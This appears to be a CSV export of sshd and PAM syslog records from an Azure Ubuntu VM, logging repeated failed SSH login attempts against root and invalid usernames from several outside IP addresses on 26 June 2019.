+14517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:48,UbuntuDevEnv,2019-06-26 05:01:48,auth,UbuntuDevEnv,info,Invalid user y\366netici from 177.23.90.10 port 54508,4457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,y,177.23.90.1,54508,,
+14518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:48,UbuntuDevEnv,2019-06-26 05:01:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:48,UbuntuDevEnv,2019-06-26 05:01:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,4457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:49,UbuntuDevEnv,2019-06-26 05:01:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34068 ssh2,4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34068,,
+14521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:50,UbuntuDevEnv,2019-06-26 05:01:50,auth,UbuntuDevEnv,info,Failed password for invalid user y\366netici from 177.23.90.10 port 54508 ssh2,4457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,y,177.23.90.1,54508,,
+14522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:50,UbuntuDevEnv,2019-06-26 05:01:50,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 54508:11: Bye Bye [preauth],4457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,54508,,
+14523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:50,UbuntuDevEnv,2019-06-26 05:01:50,auth,UbuntuDevEnv,info,Disconnected from invalid user y\\366netici 177.23.90.10 port 54508 [preauth],4457,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,y,177.23.90.1,54508,,
+14524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:52,UbuntuDevEnv,2019-06-26 05:01:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34068 ssh2,4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34068,,
+14525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:00,UbuntuDevEnv,2019-06-26 05:01:59,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 34068 ssh2],4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34068,,
+14526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:00,UbuntuDevEnv,2019-06-26 05:02:00,auth,UbuntuDevEnv,info,Invalid user steam from 200.6.188.38 port 25519,4507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,200.6.188.3,25519,,
+14527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:00,UbuntuDevEnv,2019-06-26 05:02:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,4507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:00,UbuntuDevEnv,2019-06-26 05:02:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34068 ssh2,4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34068,,
+14530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 34068 ssh2 [preauth],4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34068,,
+14532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 34068: Too many authentication failures [preauth],4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,34068,,
+14534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,auth,UbuntuDevEnv,info,Failed password for invalid user steam from 200.6.188.38 port 25519 ssh2,4507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,200.6.188.3,25519,,
+14535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 25519:11: Bye Bye [preauth],4507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,25519,,
+14536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:02,UbuntuDevEnv,2019-06-26 05:02:02,auth,UbuntuDevEnv,info,Disconnected from invalid user steam 200.6.188.38 port 25519 [preauth],4507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,200.6.188.3,25519,,
+14537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:05,UbuntuDevEnv,2019-06-26 05:02:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:07,UbuntuDevEnv,2019-06-26 05:02:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39874 ssh2,4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39874,,
+14539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:22,UbuntuDevEnv,2019-06-26 05:02:21,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 39874 ssh2 [preauth],4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39874,,
+14540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:22,UbuntuDevEnv,2019-06-26 05:02:21,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:22,UbuntuDevEnv,2019-06-26 05:02:21,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 39874 ssh2],4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39874,,
+14542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:22,UbuntuDevEnv,2019-06-26 05:02:21,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 39874: Too many authentication failures [preauth],4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,39874,,
+14543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:22,UbuntuDevEnv,2019-06-26 05:02:21,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:25,UbuntuDevEnv,2019-06-26 05:02:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:28,UbuntuDevEnv,2019-06-26 05:02:27,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 46246 ssh2,4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,46246,,
+14546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:28,UbuntuDevEnv,2019-06-26 05:02:27,auth,UbuntuDevEnv,info,Connection closed by 185.244.25.235 port 45228 [preauth],4595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.244.25.2,45228,,
+14547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:30,UbuntuDevEnv,2019-06-26 05:02:30,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 46246 ssh2,4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,46246,,
+14548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:42,UbuntuDevEnv,2019-06-26 05:02:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 46246: Too many authentication failures [preauth],4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,46246,,
+14549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:42,UbuntuDevEnv,2019-06-26 05:02:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 46246 ssh2 [preauth],4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,46246,,
+14550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:42,UbuntuDevEnv,2019-06-26 05:02:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:42,UbuntuDevEnv,2019-06-26 05:02:41,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 46246 ssh2],4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,46246,,
+14552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:42,UbuntuDevEnv,2019-06-26 05:02:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:43,UbuntuDevEnv,2019-06-26 05:02:42,auth,UbuntuDevEnv,info,Invalid user education from 140.143.223.242 port 60950,4658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,education,140.143.223.2,60950,,
+14554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:43,UbuntuDevEnv,2019-06-26 05:02:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:43,UbuntuDevEnv,2019-06-26 05:02:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,4658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+14556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:45,UbuntuDevEnv,2019-06-26 05:02:44,auth,UbuntuDevEnv,info,Failed password for invalid user education from 140.143.223.242 port 60950 ssh2,4658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,education,140.143.223.2,60950,,
+14557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:45,UbuntuDevEnv,2019-06-26 05:02:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:45,UbuntuDevEnv,2019-06-26 05:02:44,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 60950:11: Bye Bye [preauth],4658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,60950,,
+14559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:45,UbuntuDevEnv,2019-06-26 05:02:44,auth,UbuntuDevEnv,info,Disconnected from invalid user education 140.143.223.242 port 60950 [preauth],4658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,education,140.143.223.2,60950,,
+14560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:02:46,UbuntuDevEnv,2019-06-26 05:02:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 52196 ssh2,4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52196,,
+14561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:00,UbuntuDevEnv,2019-06-26 05:02:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 52196 ssh2 [preauth],4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52196,,
+14562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:00,UbuntuDevEnv,2019-06-26 05:02:59,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 52196: Too many authentication failures [preauth],4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,52196,,
+14563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:00,UbuntuDevEnv,2019-06-26 05:02:59,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 52196 ssh2],4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52196,,
+14564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:00,UbuntuDevEnv,2019-06-26 05:02:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:00,UbuntuDevEnv,2019-06-26 05:02:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:03,UbuntuDevEnv,2019-06-26 05:03:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:05,UbuntuDevEnv,2019-06-26 05:03:05,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 58584 ssh2,4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,58584,,
+14568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:06,UbuntuDevEnv,2019-06-26 05:03:06,auth,UbuntuDevEnv,info,Invalid user zabbix from 5.135.161.72 port 40498,4755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,5.135.161.7,40498,,
+14569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:06,UbuntuDevEnv,2019-06-26 05:03:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,4755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:06,UbuntuDevEnv,2019-06-26 05:03:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:08,UbuntuDevEnv,2019-06-26 05:03:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 58584 ssh2,4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,58584,,
+14572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:08,UbuntuDevEnv,2019-06-26 05:03:07,auth,UbuntuDevEnv,info,Failed password for invalid user zabbix from 5.135.161.72 port 40498 ssh2,4755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,5.135.161.7,40498,,
+14573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:08,UbuntuDevEnv,2019-06-26 05:03:07,auth,UbuntuDevEnv,info,Disconnected from invalid user zabbix 5.135.161.72 port 40498 [preauth],4755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,5.135.161.7,40498,,
+14574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:08,UbuntuDevEnv,2019-06-26 05:03:07,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 40498:11: Bye Bye [preauth],4755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,40498,,
+14575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:10,UbuntuDevEnv,2019-06-26 05:03:10,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 58584 ssh2,4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,58584,,
+14576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:03:17,UbuntuDevEnv,2019-06-26 05:03:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
